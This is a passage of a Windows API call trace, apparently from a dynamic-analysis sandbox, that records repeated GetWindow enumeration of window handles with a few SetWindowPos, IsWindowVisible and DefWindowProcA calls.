(hWnd=0x1006c, uCmd=0x2) returned 0x1006a [0057.550] GetWindow (hWnd=0x1006a, uCmd=0x2) returned 0x10062 [0057.550] GetWindow (hWnd=0x10062, uCmd=0x2) returned 0x10050 [0057.551] GetWindow (hWnd=0x10050, uCmd=0x2) returned 0x200fa [0057.551] GetWindow (hWnd=0x200fa, uCmd=0x2) returned 0x200fc [0057.551] GetWindow (hWnd=0x200fc, uCmd=0x2) returned 0x100f6 [0057.551] GetWindow (hWnd=0x100f6, uCmd=0x2) returned 0x100f8 
[0057.551] GetWindow (hWnd=0x100f8, uCmd=0x2) returned 0x1004c [0057.551] GetWindow (hWnd=0x1004c, uCmd=0x2) returned 0x10038 [0057.551] GetWindow (hWnd=0x10038, uCmd=0x2) returned 0x10030 [0057.551] GetWindow (hWnd=0x10030, uCmd=0x2) returned 0x2002c [0057.551] GetWindow (hWnd=0x2002c, uCmd=0x2) returned 0x1002e [0057.551] GetWindow (hWnd=0x1002e, uCmd=0x2) returned 0x20026 [0057.551] GetWindow (hWnd=0x20026, uCmd=0x2) returned 0x1002a [0057.551] GetWindow (hWnd=0x1002a, uCmd=0x2) returned 0x20028 [0057.551] GetWindow (hWnd=0x20028, uCmd=0x2) returned 0x100ee [0057.551] GetWindow (hWnd=0x100ee, uCmd=0x2) returned 0x100ec [0057.551] GetWindow (hWnd=0x100ec, uCmd=0x2) returned 0x100ca [0057.551] GetWindow (hWnd=0x100ca, uCmd=0x2) returned 0x0 [0057.551] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.551] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.551] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.551] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.551] GetWindow (hWnd=0x10118, uCmd=0x2) returned 0x10112 [0057.551] GetWindow (hWnd=0x10112, uCmd=0x2) returned 0x10110 [0057.551] GetWindow (hWnd=0x10110, uCmd=0x2) returned 0x200aa [0057.551] GetWindow (hWnd=0x200aa, uCmd=0x2) returned 0x200c6 [0057.552] GetWindow (hWnd=0x200c6, uCmd=0x2) returned 0x200d6 [0057.552] GetWindow (hWnd=0x200d6, uCmd=0x2) returned 0x200c4 [0057.552] GetWindow (hWnd=0x200c4, uCmd=0x2) returned 0x1005e [0057.552] GetWindow (hWnd=0x1005e, uCmd=0x2) returned 0x1005c [0057.552] GetWindow (hWnd=0x1005c, uCmd=0x2) returned 0x10048 [0057.552] GetWindow (hWnd=0x10048, uCmd=0x2) returned 0x10072 [0057.552] GetWindow (hWnd=0x10072, uCmd=0x2) returned 0x10066 [0057.552] GetWindow (hWnd=0x10066, uCmd=0x2) returned 0x10064 [0057.552] GetWindow (hWnd=0x10064, uCmd=0x2) returned 0x10060 [0057.552] GetWindow (hWnd=0x10060, uCmd=0x2) returned 0x1003e [0057.552] 
GetWindow (hWnd=0x1003e, uCmd=0x2) returned 0x1003a [0057.552] GetWindow (hWnd=0x1003a, uCmd=0x2) returned 0x10040 [0057.552] GetWindow (hWnd=0x10040, uCmd=0x2) returned 0x1003c [0057.552] GetWindow (hWnd=0x1003c, uCmd=0x2) returned 0x100d2 [0057.552] GetWindow (hWnd=0x100d2, uCmd=0x2) returned 0x5007c [0057.552] GetWindow (hWnd=0x5007c, uCmd=0x2) returned 0x10074 [0057.552] GetWindow (hWnd=0x10074, uCmd=0x2) returned 0x601a8 [0057.552] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.552] GetWindow (hWnd=0x601a8, uCmd=0x2) returned 0x70104 [0057.552] GetWindow (hWnd=0x70104, uCmd=0x2) returned 0x301fc [0057.552] GetWindow (hWnd=0x301fc, uCmd=0x2) returned 0x401e4 [0057.552] GetWindow (hWnd=0x401e4, uCmd=0x2) returned 0x101e2 [0057.552] GetWindow (hWnd=0x101e2, uCmd=0x2) returned 0x101ac [0057.552] GetWindow (hWnd=0x101ac, uCmd=0x2) returned 0x601a4 [0057.552] GetWindow (hWnd=0x601a4, uCmd=0x2) returned 0x201d4 [0057.552] GetWindow (hWnd=0x201d4, uCmd=0x2) returned 0x101b6 [0057.552] GetWindow (hWnd=0x101b6, uCmd=0x2) returned 0x101c8 [0057.552] GetWindow (hWnd=0x101c8, uCmd=0x2) returned 0x201c4 [0057.552] GetWindow (hWnd=0x201c4, uCmd=0x2) returned 0x101b8 [0057.552] GetWindow (hWnd=0x101b8, uCmd=0x2) returned 0x101aa [0057.552] GetWindow (hWnd=0x101aa, uCmd=0x2) returned 0x10192 [0057.552] GetWindow (hWnd=0x10192, uCmd=0x2) returned 0x10190 [0057.553] GetWindow (hWnd=0x10190, uCmd=0x2) returned 0x1018e [0057.553] GetWindow (hWnd=0x1018e, uCmd=0x2) returned 0x1018c [0057.553] GetWindow (hWnd=0x1018c, uCmd=0x2) returned 0x1018a [0057.553] GetWindow (hWnd=0x1018a, uCmd=0x2) returned 0x10188 [0057.553] GetWindow (hWnd=0x10188, uCmd=0x2) returned 0x10184 [0057.553] GetWindow (hWnd=0x10184, uCmd=0x2) returned 0x10186 [0057.553] GetWindow (hWnd=0x10186, uCmd=0x2) returned 0x10180 [0057.553] GetWindow (hWnd=0x10180, uCmd=0x2) returned 0x10182 [0057.553] GetWindow (hWnd=0x10182, uCmd=0x2) returned 0x1017c [0057.553] GetWindow (hWnd=0x1017c, uCmd=0x2) returned 0x1017e 
[0057.553] GetWindow (hWnd=0x1017e, uCmd=0x2) returned 0x10178 [0057.553] GetWindow (hWnd=0x10178, uCmd=0x2) returned 0x1017a [0057.553] GetWindow (hWnd=0x1017a, uCmd=0x2) returned 0x10174 [0057.553] GetWindow (hWnd=0x10174, uCmd=0x2) returned 0x10176 [0057.553] GetWindow (hWnd=0x10176, uCmd=0x2) returned 0x10170 [0057.553] GetWindow (hWnd=0x10170, uCmd=0x2) returned 0x10172 [0057.553] GetWindow (hWnd=0x10172, uCmd=0x2) returned 0x1016c [0057.553] GetWindow (hWnd=0x1016c, uCmd=0x2) returned 0x1016e [0057.553] GetWindow (hWnd=0x1016e, uCmd=0x2) returned 0x10168 [0057.553] GetWindow (hWnd=0x10168, uCmd=0x2) returned 0x1016a [0057.553] GetWindow (hWnd=0x1016a, uCmd=0x2) returned 0x10164 [0057.553] GetWindow (hWnd=0x10164, uCmd=0x2) returned 0x10166 [0057.553] GetWindow (hWnd=0x10166, uCmd=0x2) returned 0x10160 [0057.553] GetWindow (hWnd=0x10160, uCmd=0x2) returned 0x10162 [0057.553] GetWindow (hWnd=0x10162, uCmd=0x2) returned 0x1015c [0057.553] GetWindow (hWnd=0x1015c, uCmd=0x2) returned 0x1015e [0057.553] GetWindow (hWnd=0x1015e, uCmd=0x2) returned 0x7013a [0057.553] GetWindow (hWnd=0x7013a, uCmd=0x2) returned 0x1015a [0057.553] GetWindow (hWnd=0x1015a, uCmd=0x2) returned 0x10156 [0057.553] GetWindow (hWnd=0x10156, uCmd=0x2) returned 0x10158 [0057.553] GetWindow (hWnd=0x10158, uCmd=0x2) returned 0x10150 [0057.554] GetWindow (hWnd=0x10150, uCmd=0x2) returned 0x10154 [0057.554] GetWindow (hWnd=0x10154, uCmd=0x2) returned 0x1014a [0057.554] GetWindow (hWnd=0x1014a, uCmd=0x2) returned 0x1014e [0057.554] GetWindow (hWnd=0x1014e, uCmd=0x2) returned 0x10144 [0057.554] GetWindow (hWnd=0x10144, uCmd=0x2) returned 0x10148 [0057.554] GetWindow (hWnd=0x10148, uCmd=0x2) returned 0x1013e [0057.554] GetWindow (hWnd=0x1013e, uCmd=0x2) returned 0x10142 [0057.554] GetWindow (hWnd=0x10142, uCmd=0x2) returned 0x10138 [0057.554] GetWindow (hWnd=0x10138, uCmd=0x2) returned 0x1013c [0057.554] GetWindow (hWnd=0x1013c, uCmd=0x2) returned 0x10134 [0057.554] GetWindow (hWnd=0x10134, uCmd=0x2) 
returned 0x10136 [0057.554] GetWindow (hWnd=0x10136, uCmd=0x2) returned 0x400dc [0057.554] GetWindow (hWnd=0x400dc, uCmd=0x2) returned 0x300e0 [0057.554] GetWindow (hWnd=0x300e0, uCmd=0x2) returned 0x10130 [0057.554] GetWindow (hWnd=0x10130, uCmd=0x2) returned 0x10122 [0057.554] GetWindow (hWnd=0x10122, uCmd=0x2) returned 0x10120 [0057.554] GetWindow (hWnd=0x10120, uCmd=0x2) returned 0x20116 [0057.554] GetWindow (hWnd=0x20116, uCmd=0x2) returned 0x1010a [0057.554] GetWindow (hWnd=0x1010a, uCmd=0x2) returned 0x1010c [0057.554] GetWindow (hWnd=0x1010c, uCmd=0x2) returned 0x2001e [0057.554] GetWindow (hWnd=0x2001e, uCmd=0x2) returned 0x20020 [0057.554] GetWindow (hWnd=0x20020, uCmd=0x2) returned 0x2001c [0057.554] GetWindow (hWnd=0x2001c, uCmd=0x2) returned 0x20016 [0057.554] GetWindow (hWnd=0x20016, uCmd=0x2) returned 0x200ae [0057.554] GetWindow (hWnd=0x200ae, uCmd=0x2) returned 0x2009e [0057.554] GetWindow (hWnd=0x2009e, uCmd=0x2) returned 0x2008c [0057.554] GetWindow (hWnd=0x2008c, uCmd=0x2) returned 0x2008e [0057.554] GetWindow (hWnd=0x2008e, uCmd=0x2) returned 0x20092 [0057.554] GetWindow (hWnd=0x20092, uCmd=0x2) returned 0x2009a [0057.554] GetWindow (hWnd=0x2009a, uCmd=0x2) returned 0x300a8 [0057.554] GetWindow (hWnd=0x300a8, uCmd=0x2) returned 0x20080 [0057.554] GetWindow (hWnd=0x20080, uCmd=0x2) returned 0x100f0 [0057.555] GetWindow (hWnd=0x100f0, uCmd=0x2) returned 0x100f2 [0057.555] GetWindow (hWnd=0x100f2, uCmd=0x2) returned 0x100ea [0057.555] GetWindow (hWnd=0x100ea, uCmd=0x2) returned 0x100e8 [0057.555] GetWindow (hWnd=0x100e8, uCmd=0x2) returned 0x100e4 [0057.555] GetWindow (hWnd=0x100e4, uCmd=0x2) returned 0x100da [0057.555] GetWindow (hWnd=0x100da, uCmd=0x2) returned 0x50076 [0057.555] GetWindow (hWnd=0x50076, uCmd=0x2) returned 0x1006c [0057.555] GetWindow (hWnd=0x1006c, uCmd=0x2) returned 0x1006a [0057.555] GetWindow (hWnd=0x1006a, uCmd=0x2) returned 0x10062 [0057.555] GetWindow (hWnd=0x10062, uCmd=0x2) returned 0x10050 [0057.555] GetWindow 
(hWnd=0x10050, uCmd=0x2) returned 0x200fa [0057.555] GetWindow (hWnd=0x200fa, uCmd=0x2) returned 0x200fc [0057.555] GetWindow (hWnd=0x200fc, uCmd=0x2) returned 0x100f6 [0057.555] GetWindow (hWnd=0x100f6, uCmd=0x2) returned 0x100f8 [0057.555] GetWindow (hWnd=0x100f8, uCmd=0x2) returned 0x1004c [0057.555] GetWindow (hWnd=0x1004c, uCmd=0x2) returned 0x10038 [0057.555] GetWindow (hWnd=0x10038, uCmd=0x2) returned 0x10030 [0057.555] GetWindow (hWnd=0x10030, uCmd=0x2) returned 0x2002c [0057.555] GetWindow (hWnd=0x2002c, uCmd=0x2) returned 0x1002e [0057.555] GetWindow (hWnd=0x1002e, uCmd=0x2) returned 0x20026 [0057.555] GetWindow (hWnd=0x20026, uCmd=0x2) returned 0x1002a [0057.555] GetWindow (hWnd=0x1002a, uCmd=0x2) returned 0x20028 [0057.555] GetWindow (hWnd=0x20028, uCmd=0x2) returned 0x100ee [0057.555] GetWindow (hWnd=0x100ee, uCmd=0x2) returned 0x100ec [0057.555] GetWindow (hWnd=0x100ec, uCmd=0x2) returned 0x100ca [0057.555] GetWindow (hWnd=0x100ca, uCmd=0x2) returned 0x0 [0057.555] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.555] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.556] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.556] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.556] GetWindow (hWnd=0x10118, uCmd=0x2) returned 0x10112 [0057.556] GetWindow (hWnd=0x10112, uCmd=0x2) returned 0x10110 [0057.556] GetWindow (hWnd=0x10110, uCmd=0x2) returned 0x200aa [0057.556] GetWindow (hWnd=0x200aa, uCmd=0x2) returned 0x200c6 [0057.556] GetWindow (hWnd=0x200c6, uCmd=0x2) returned 0x200d6 [0057.556] GetWindow (hWnd=0x200d6, uCmd=0x2) returned 0x200c4 [0057.556] GetWindow (hWnd=0x200c4, uCmd=0x2) returned 0x1005e [0057.556] GetWindow (hWnd=0x1005e, uCmd=0x2) returned 0x1005c [0057.556] GetWindow (hWnd=0x1005c, uCmd=0x2) returned 0x10048 [0057.556] GetWindow (hWnd=0x10048, uCmd=0x2) returned 0x10072 [0057.556] GetWindow 
(hWnd=0x10072, uCmd=0x2) returned 0x10066 [0057.556] GetWindow (hWnd=0x10066, uCmd=0x2) returned 0x10064 [0057.556] GetWindow (hWnd=0x10064, uCmd=0x2) returned 0x10060 [0057.556] GetWindow (hWnd=0x10060, uCmd=0x2) returned 0x1003e [0057.556] GetWindow (hWnd=0x1003e, uCmd=0x2) returned 0x1003a [0057.556] GetWindow (hWnd=0x1003a, uCmd=0x2) returned 0x10040 [0057.556] GetWindow (hWnd=0x10040, uCmd=0x2) returned 0x1003c [0057.556] GetWindow (hWnd=0x1003c, uCmd=0x2) returned 0x100d2 [0057.556] GetWindow (hWnd=0x100d2, uCmd=0x2) returned 0x5007c [0057.556] GetWindow (hWnd=0x5007c, uCmd=0x2) returned 0x10074 [0057.556] GetWindow (hWnd=0x10074, uCmd=0x2) returned 0x601a8 [0057.556] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.556] GetWindow (hWnd=0x601a8, uCmd=0x2) returned 0x70104 [0057.556] GetWindow (hWnd=0x70104, uCmd=0x2) returned 0x301fc [0057.556] GetWindow (hWnd=0x301fc, uCmd=0x2) returned 0x401e4 [0057.556] GetWindow (hWnd=0x401e4, uCmd=0x2) returned 0x101e2 [0057.556] GetWindow (hWnd=0x101e2, uCmd=0x2) returned 0x101ac [0057.556] GetWindow (hWnd=0x101ac, uCmd=0x2) returned 0x601a4 [0057.556] GetWindow (hWnd=0x601a4, uCmd=0x2) returned 0x201d4 [0057.557] GetWindow (hWnd=0x201d4, uCmd=0x2) returned 0x101b6 [0057.557] GetWindow (hWnd=0x101b6, uCmd=0x2) returned 0x101c8 [0057.557] GetWindow (hWnd=0x101c8, uCmd=0x2) returned 0x201c4 [0057.557] GetWindow (hWnd=0x201c4, uCmd=0x2) returned 0x101b8 [0057.557] GetWindow (hWnd=0x101b8, uCmd=0x2) returned 0x101aa [0057.557] GetWindow (hWnd=0x101aa, uCmd=0x2) returned 0x10192 [0057.557] GetWindow (hWnd=0x10192, uCmd=0x2) returned 0x10190 [0057.557] GetWindow (hWnd=0x10190, uCmd=0x2) returned 0x1018e [0057.557] GetWindow (hWnd=0x1018e, uCmd=0x2) returned 0x1018c [0057.557] GetWindow (hWnd=0x1018c, uCmd=0x2) returned 0x1018a [0057.557] GetWindow (hWnd=0x1018a, uCmd=0x2) returned 0x10188 [0057.557] GetWindow (hWnd=0x10188, uCmd=0x2) returned 0x10184 [0057.557] GetWindow (hWnd=0x10184, uCmd=0x2) returned 0x10186 [0057.557] 
GetWindow (hWnd=0x10186, uCmd=0x2) returned 0x10180 [0057.557] GetWindow (hWnd=0x10180, uCmd=0x2) returned 0x10182 [0057.557] GetWindow (hWnd=0x10182, uCmd=0x2) returned 0x1017c [0057.557] GetWindow (hWnd=0x1017c, uCmd=0x2) returned 0x1017e [0057.557] GetWindow (hWnd=0x1017e, uCmd=0x2) returned 0x10178 [0057.557] GetWindow (hWnd=0x10178, uCmd=0x2) returned 0x1017a [0057.557] GetWindow (hWnd=0x1017a, uCmd=0x2) returned 0x10174 [0057.557] GetWindow (hWnd=0x10174, uCmd=0x2) returned 0x10176 [0057.557] GetWindow (hWnd=0x10176, uCmd=0x2) returned 0x10170 [0057.557] GetWindow (hWnd=0x10170, uCmd=0x2) returned 0x10172 [0057.557] GetWindow (hWnd=0x10172, uCmd=0x2) returned 0x1016c [0057.558] GetWindow (hWnd=0x1016c, uCmd=0x2) returned 0x1016e [0057.558] GetWindow (hWnd=0x1016e, uCmd=0x2) returned 0x10168 [0057.558] GetWindow (hWnd=0x10168, uCmd=0x2) returned 0x1016a [0057.558] GetWindow (hWnd=0x1016a, uCmd=0x2) returned 0x10164 [0057.558] GetWindow (hWnd=0x10164, uCmd=0x2) returned 0x10166 [0057.558] GetWindow (hWnd=0x10166, uCmd=0x2) returned 0x10160 [0057.558] GetWindow (hWnd=0x10160, uCmd=0x2) returned 0x10162 [0057.558] GetWindow (hWnd=0x10162, uCmd=0x2) returned 0x1015c [0057.558] GetWindow (hWnd=0x1015c, uCmd=0x2) returned 0x1015e [0057.558] GetWindow (hWnd=0x1015e, uCmd=0x2) returned 0x7013a [0057.558] GetWindow (hWnd=0x7013a, uCmd=0x2) returned 0x1015a [0057.558] GetWindow (hWnd=0x1015a, uCmd=0x2) returned 0x10156 [0057.558] GetWindow (hWnd=0x10156, uCmd=0x2) returned 0x10158 [0057.558] GetWindow (hWnd=0x10158, uCmd=0x2) returned 0x10150 [0057.558] GetWindow (hWnd=0x10150, uCmd=0x2) returned 0x10154 [0057.558] GetWindow (hWnd=0x10154, uCmd=0x2) returned 0x1014a [0057.558] GetWindow (hWnd=0x1014a, uCmd=0x2) returned 0x1014e [0057.558] GetWindow (hWnd=0x1014e, uCmd=0x2) returned 0x10144 [0057.558] GetWindow (hWnd=0x10144, uCmd=0x2) returned 0x10148 [0057.558] GetWindow (hWnd=0x10148, uCmd=0x2) returned 0x1013e [0057.558] GetWindow (hWnd=0x1013e, uCmd=0x2) returned 
0x10142 [0057.558] GetWindow (hWnd=0x10142, uCmd=0x2) returned 0x10138 [0057.558] GetWindow (hWnd=0x10138, uCmd=0x2) returned 0x1013c [0057.558] GetWindow (hWnd=0x1013c, uCmd=0x2) returned 0x10134 [0057.558] GetWindow (hWnd=0x10134, uCmd=0x2) returned 0x10136 [0057.559] GetWindow (hWnd=0x10136, uCmd=0x2) returned 0x400dc [0057.559] GetWindow (hWnd=0x400dc, uCmd=0x2) returned 0x300e0 [0057.559] GetWindow (hWnd=0x300e0, uCmd=0x2) returned 0x10130 [0057.559] GetWindow (hWnd=0x10130, uCmd=0x2) returned 0x10122 [0057.559] GetWindow (hWnd=0x10122, uCmd=0x2) returned 0x10120 [0057.559] GetWindow (hWnd=0x10120, uCmd=0x2) returned 0x20116 [0057.559] GetWindow (hWnd=0x20116, uCmd=0x2) returned 0x1010a [0057.559] GetWindow (hWnd=0x1010a, uCmd=0x2) returned 0x1010c [0057.559] GetWindow (hWnd=0x1010c, uCmd=0x2) returned 0x2001e [0057.559] GetWindow (hWnd=0x2001e, uCmd=0x2) returned 0x20020 [0057.559] GetWindow (hWnd=0x20020, uCmd=0x2) returned 0x2001c [0057.559] GetWindow (hWnd=0x2001c, uCmd=0x2) returned 0x20016 [0057.559] GetWindow (hWnd=0x20016, uCmd=0x2) returned 0x200ae [0057.559] GetWindow (hWnd=0x200ae, uCmd=0x2) returned 0x2009e [0057.559] GetWindow (hWnd=0x2009e, uCmd=0x2) returned 0x2008c [0057.559] GetWindow (hWnd=0x2008c, uCmd=0x2) returned 0x2008e [0057.559] GetWindow (hWnd=0x2008e, uCmd=0x2) returned 0x20092 [0057.559] GetWindow (hWnd=0x20092, uCmd=0x2) returned 0x2009a [0057.559] GetWindow (hWnd=0x2009a, uCmd=0x2) returned 0x300a8 [0057.559] GetWindow (hWnd=0x300a8, uCmd=0x2) returned 0x20080 [0057.559] GetWindow (hWnd=0x20080, uCmd=0x2) returned 0x100f0 [0057.559] GetWindow (hWnd=0x100f0, uCmd=0x2) returned 0x100f2 [0057.559] GetWindow (hWnd=0x100f2, uCmd=0x2) returned 0x100ea [0057.559] GetWindow (hWnd=0x100ea, uCmd=0x2) returned 0x100e8 [0057.559] GetWindow (hWnd=0x100e8, uCmd=0x2) returned 0x100e4 [0057.560] GetWindow (hWnd=0x100e4, uCmd=0x2) returned 0x100da [0057.560] GetWindow (hWnd=0x100da, uCmd=0x2) returned 0x50076 [0057.560] GetWindow (hWnd=0x50076, 
uCmd=0x2) returned 0x1006c [0057.560] GetWindow (hWnd=0x1006c, uCmd=0x2) returned 0x1006a [0057.560] GetWindow (hWnd=0x1006a, uCmd=0x2) returned 0x10062 [0057.560] GetWindow (hWnd=0x10062, uCmd=0x2) returned 0x10050 [0057.560] GetWindow (hWnd=0x10050, uCmd=0x2) returned 0x200fa [0057.560] GetWindow (hWnd=0x200fa, uCmd=0x2) returned 0x200fc [0057.560] GetWindow (hWnd=0x200fc, uCmd=0x2) returned 0x100f6 [0057.560] GetWindow (hWnd=0x100f6, uCmd=0x2) returned 0x100f8 [0057.560] GetWindow (hWnd=0x100f8, uCmd=0x2) returned 0x1004c [0057.560] GetWindow (hWnd=0x1004c, uCmd=0x2) returned 0x10038 [0057.560] GetWindow (hWnd=0x10038, uCmd=0x2) returned 0x10030 [0057.560] GetWindow (hWnd=0x10030, uCmd=0x2) returned 0x2002c [0057.560] GetWindow (hWnd=0x2002c, uCmd=0x2) returned 0x1002e [0057.560] GetWindow (hWnd=0x1002e, uCmd=0x2) returned 0x20026 [0057.560] GetWindow (hWnd=0x20026, uCmd=0x2) returned 0x1002a [0057.560] GetWindow (hWnd=0x1002a, uCmd=0x2) returned 0x20028 [0057.560] GetWindow (hWnd=0x20028, uCmd=0x2) returned 0x100ee [0057.560] GetWindow (hWnd=0x100ee, uCmd=0x2) returned 0x100ec [0057.560] GetWindow (hWnd=0x100ec, uCmd=0x2) returned 0x100ca [0057.560] GetWindow (hWnd=0x100ca, uCmd=0x2) returned 0x0 [0057.560] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.560] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.561] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.561] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.561] GetWindow (hWnd=0x10118, uCmd=0x2) returned 0x10112 [0057.561] GetWindow (hWnd=0x10112, uCmd=0x2) returned 0x10110 [0057.561] GetWindow (hWnd=0x10110, uCmd=0x2) returned 0x200aa [0057.561] GetWindow (hWnd=0x200aa, uCmd=0x2) returned 0x200c6 [0057.561] GetWindow (hWnd=0x200c6, uCmd=0x2) returned 0x200d6 [0057.561] GetWindow (hWnd=0x200d6, uCmd=0x2) returned 0x200c4 [0057.561] GetWindow (hWnd=0x200c4, uCmd=0x2) 
returned 0x1005e [0057.561] GetWindow (hWnd=0x1005e, uCmd=0x2) returned 0x1005c [0057.561] GetWindow (hWnd=0x1005c, uCmd=0x2) returned 0x10048 [0057.561] GetWindow (hWnd=0x10048, uCmd=0x2) returned 0x10072 [0057.561] GetWindow (hWnd=0x10072, uCmd=0x2) returned 0x10066 [0057.561] GetWindow (hWnd=0x10066, uCmd=0x2) returned 0x10064 [0057.561] GetWindow (hWnd=0x10064, uCmd=0x2) returned 0x10060 [0057.561] GetWindow (hWnd=0x10060, uCmd=0x2) returned 0x1003e [0057.561] GetWindow (hWnd=0x1003e, uCmd=0x2) returned 0x1003a [0057.561] GetWindow (hWnd=0x1003a, uCmd=0x2) returned 0x10040 [0057.561] GetWindow (hWnd=0x10040, uCmd=0x2) returned 0x1003c [0057.561] GetWindow (hWnd=0x1003c, uCmd=0x2) returned 0x100d2 [0057.561] GetWindow (hWnd=0x100d2, uCmd=0x2) returned 0x5007c [0057.561] GetWindow (hWnd=0x5007c, uCmd=0x2) returned 0x10074 [0057.561] GetWindow (hWnd=0x10074, uCmd=0x2) returned 0x601a8 [0057.561] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.561] GetWindow (hWnd=0x601a8, uCmd=0x2) returned 0x70104 [0057.561] GetWindow (hWnd=0x70104, uCmd=0x2) returned 0x301fc [0057.561] GetWindow (hWnd=0x301fc, uCmd=0x2) returned 0x401e4 [0057.561] GetWindow (hWnd=0x401e4, uCmd=0x2) returned 0x101e2 [0057.561] GetWindow (hWnd=0x101e2, uCmd=0x2) returned 0x101ac [0057.561] GetWindow (hWnd=0x101ac, uCmd=0x2) returned 0x601a4 [0057.562] GetWindow (hWnd=0x601a4, uCmd=0x2) returned 0x201d4 [0057.562] GetWindow (hWnd=0x201d4, uCmd=0x2) returned 0x101b6 [0057.562] GetWindow (hWnd=0x101b6, uCmd=0x2) returned 0x101c8 [0057.562] GetWindow (hWnd=0x101c8, uCmd=0x2) returned 0x201c4 [0057.562] GetWindow (hWnd=0x201c4, uCmd=0x2) returned 0x101b8 [0057.562] GetWindow (hWnd=0x101b8, uCmd=0x2) returned 0x101aa [0057.562] GetWindow (hWnd=0x101aa, uCmd=0x2) returned 0x10192 [0057.562] GetWindow (hWnd=0x10192, uCmd=0x2) returned 0x10190 [0057.562] GetWindow (hWnd=0x10190, uCmd=0x2) returned 0x1018e [0057.562] GetWindow (hWnd=0x1018e, uCmd=0x2) returned 0x1018c [0057.562] GetWindow (hWnd=0x1018c, 
uCmd=0x2) returned 0x1018a [0057.562] GetWindow (hWnd=0x1018a, uCmd=0x2) returned 0x10188 [0057.562] GetWindow (hWnd=0x10188, uCmd=0x2) returned 0x10184 [0057.562] GetWindow (hWnd=0x10184, uCmd=0x2) returned 0x10186 [0057.562] GetWindow (hWnd=0x10186, uCmd=0x2) returned 0x10180 [0057.562] GetWindow (hWnd=0x10180, uCmd=0x2) returned 0x10182 [0057.562] GetWindow (hWnd=0x10182, uCmd=0x2) returned 0x1017c [0057.562] GetWindow (hWnd=0x1017c, uCmd=0x2) returned 0x1017e [0057.562] GetWindow (hWnd=0x1017e, uCmd=0x2) returned 0x10178 [0057.562] GetWindow (hWnd=0x10178, uCmd=0x2) returned 0x1017a [0057.562] GetWindow (hWnd=0x1017a, uCmd=0x2) returned 0x10174 [0057.562] GetWindow (hWnd=0x10174, uCmd=0x2) returned 0x10176 [0057.562] GetWindow (hWnd=0x10176, uCmd=0x2) returned 0x10170 [0057.562] GetWindow (hWnd=0x10170, uCmd=0x2) returned 0x10172 [0057.562] GetWindow (hWnd=0x10172, uCmd=0x2) returned 0x1016c [0057.562] GetWindow (hWnd=0x1016c, uCmd=0x2) returned 0x1016e [0057.562] GetWindow (hWnd=0x1016e, uCmd=0x2) returned 0x10168 [0057.562] GetWindow (hWnd=0x10168, uCmd=0x2) returned 0x1016a [0057.562] GetWindow (hWnd=0x1016a, uCmd=0x2) returned 0x10164 [0057.562] GetWindow (hWnd=0x10164, uCmd=0x2) returned 0x10166 [0057.562] GetWindow (hWnd=0x10166, uCmd=0x2) returned 0x10160 [0057.562] GetWindow (hWnd=0x10160, uCmd=0x2) returned 0x10162 [0057.563] GetWindow (hWnd=0x10162, uCmd=0x2) returned 0x1015c [0057.563] GetWindow (hWnd=0x1015c, uCmd=0x2) returned 0x1015e [0057.563] GetWindow (hWnd=0x1015e, uCmd=0x2) returned 0x7013a [0057.563] GetWindow (hWnd=0x7013a, uCmd=0x2) returned 0x1015a [0057.563] GetWindow (hWnd=0x1015a, uCmd=0x2) returned 0x10156 [0057.563] GetWindow (hWnd=0x10156, uCmd=0x2) returned 0x10158 [0057.563] GetWindow (hWnd=0x10158, uCmd=0x2) returned 0x10150 [0057.563] GetWindow (hWnd=0x10150, uCmd=0x2) returned 0x10154 [0057.563] GetWindow (hWnd=0x10154, uCmd=0x2) returned 0x1014a [0057.563] GetWindow (hWnd=0x1014a, uCmd=0x2) returned 0x1014e [0057.563] 
GetWindow (hWnd=0x1014e, uCmd=0x2) returned 0x10144 [0057.563] GetWindow (hWnd=0x10144, uCmd=0x2) returned 0x10148 [0057.563] GetWindow (hWnd=0x10148, uCmd=0x2) returned 0x1013e [0057.563] GetWindow (hWnd=0x1013e, uCmd=0x2) returned 0x10142 [0057.563] GetWindow (hWnd=0x10142, uCmd=0x2) returned 0x10138 [0057.563] GetWindow (hWnd=0x10138, uCmd=0x2) returned 0x1013c [0057.563] GetWindow (hWnd=0x1013c, uCmd=0x2) returned 0x10134 [0057.563] GetWindow (hWnd=0x10134, uCmd=0x2) returned 0x10136 [0057.563] GetWindow (hWnd=0x10136, uCmd=0x2) returned 0x400dc [0057.563] GetWindow (hWnd=0x400dc, uCmd=0x2) returned 0x300e0 [0057.563] GetWindow (hWnd=0x300e0, uCmd=0x2) returned 0x10130 [0057.563] GetWindow (hWnd=0x10130, uCmd=0x2) returned 0x10122 [0057.563] GetWindow (hWnd=0x10122, uCmd=0x2) returned 0x10120 [0057.563] GetWindow (hWnd=0x10120, uCmd=0x2) returned 0x20116 [0057.563] GetWindow (hWnd=0x20116, uCmd=0x2) returned 0x1010a [0057.563] GetWindow (hWnd=0x1010a, uCmd=0x2) returned 0x1010c [0057.563] GetWindow (hWnd=0x1010c, uCmd=0x2) returned 0x2001e [0057.563] GetWindow (hWnd=0x2001e, uCmd=0x2) returned 0x20020 [0057.563] GetWindow (hWnd=0x20020, uCmd=0x2) returned 0x2001c [0057.563] GetWindow (hWnd=0x2001c, uCmd=0x2) returned 0x20016 [0057.563] GetWindow (hWnd=0x20016, uCmd=0x2) returned 0x200ae [0057.564] GetWindow (hWnd=0x200ae, 